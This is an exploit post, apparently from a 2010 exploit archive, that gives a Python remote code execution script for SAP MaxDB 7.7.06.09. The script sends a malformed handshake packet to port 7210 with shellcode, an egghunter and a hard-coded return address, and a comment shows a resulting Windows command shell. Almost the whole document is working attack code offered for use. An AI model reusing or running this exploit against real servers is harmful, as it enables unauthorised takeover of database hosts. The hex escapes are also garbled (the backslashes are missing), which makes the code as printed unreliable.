SAP MaxDB Malformed Handshake Request Remote Code Execution
Posted on 26 March 2010
=========================================================== SAP MaxDB Malformed Handshake Request Remote Code Execution =========================================================== #!/usr/bin/python # Exploit title: SAP MaxDB Malformed Handshake Request Remote Code Execution # Date: 2010.03.26 # Author: S2 Crew [Hungary] # Software link: sap.com<http://sap.com> # Version: 7.7.06.09 # Tested on: Windows XP SP2 EN # CVE: ZDI-10-032 # Code: ############################################################# # Trying 172.16.29.133... # Connected to 172.16.29.133. # Escape character is '^]'. # Microsoft Windows XP [Version 5.1.2600] # (C) Copyright 1985-2001 Microsoft Corp. # # C:sdbdatawrk> ############################################################# import socket import sys import os sc = ( "x31xc9xdaxdaxbex94x3fxbexeaxb1x56xd9x74x24xf4" "x5fx31x77x17x03x77x17x83xefxfcx76xcax42x02xff" "x35xbbxd3x9fxbcx5exe2x8dxdbx2bx57x01xafx7ex54" "xeaxfdx6axefx9ex29x9cx58x14x0cx93x59x99x90x7f" "x99xb8x6cx82xcex1ax4cx4dx03x5bx89xb0xecx09x42" "xbex5fxbdxe7x82x63xbcx27x89xdcxc6x42x4exa8x7c" "x4cx9fx01x0bx06x07x29x53xb7x36xfex80x8bx71x8b" "x72x7fx80x5dx4bx80xb2xa1x07xbfx7ax2cx56x87xbd" "xcfx2dxf3xbdx72x35xc0xbcxa8xb0xd5x67x3ax62x3e" "x99xefxf4xb5x95x44x73x91xb9x5bx50xa9xc6xd0x57" "x7ex4fxa2x73x5ax0bx70x1axfbxf1xd7x23x1bx5dx87" "x81x57x4cxdcxb3x35x19x11x89xc5xd9x3dx9axb6xeb" "xe2x30x51x40x6ax9exa6xa7x41x66x38x56x6ax96x10" "x9dx3exc6x0ax34x3fx8dxcaxb9xeax01x9bx15x45xe1" "x4bxd6x35x89x81xd9x6axa9xa9x33x1dxeex67x67x4d" "x98x85x97x63x04x03x71xe9xa4x45x29x86x06xb2xe2" "x31x79x90x5exe9xedxacx88x2dx12x2dx9fx1dxbfx85" "x48xd6xd3x11x68xe9xfex31xe3xd1x68xcbx9dx90x09" "xccxb7x43xaax5fx5cx94xa5x43xcbxc3xe2xb2x02x81" "x1execxbcxb4xe3x68x86x7dx3fx49x09x7fxb2xf5x2d" "x6fx0axf5x69xdbxc2xa0x27xb5xa4x1ax86x6fx7exf0" "x40xf8x07x3ax53x7ex08x17x25x9exb8xcex70xa0x74" "x87x74xd9x69x37x7ax30x2ax47x31x19x1axc0x9cxcb" "x1fx8dx1ex26x63xa8x9cxc3x1bx4fxbcxa1x1ex0bx7a" "x59x52x04xefx5dxc1x25x3ax57") egghunter = ( "x66x81xcaxffx0fx42x52x6a" "x02x58xcdx2ex3cx05x5ax74" "xefxb8x54x30x30x57x8bxfa" "xafx75xeaxafx75xe7xffxe7" ) host = "172.16.29.133" port = 7210 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) ret = "x08xf1xa0x00" # HC packet = ( "x63x00x00x00x03x2fx00x00x01x00x00x00" "xffxffxffxffx00x00x04x00x63x00x00x00" "x00x02x4bx00x04x09x00x00x44x20x00x00" "x00x00x00x00x00x00x00x00xffxffxffxff" "x6dx61" + ret + "x00x00x00x00x00x00" "x00x00x00x00x07x49" + "A"*5000 + "T00WT00W" + sc + "x41" * 2500 + egghunter + "x90"*2500) s.send(packet) s.close() # Inj3ct0r.com [2010-03-26]
